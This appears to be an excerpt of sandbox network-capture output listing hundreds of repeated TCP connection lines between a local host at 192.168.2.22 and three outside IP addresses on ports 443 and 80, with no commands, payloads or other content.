Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
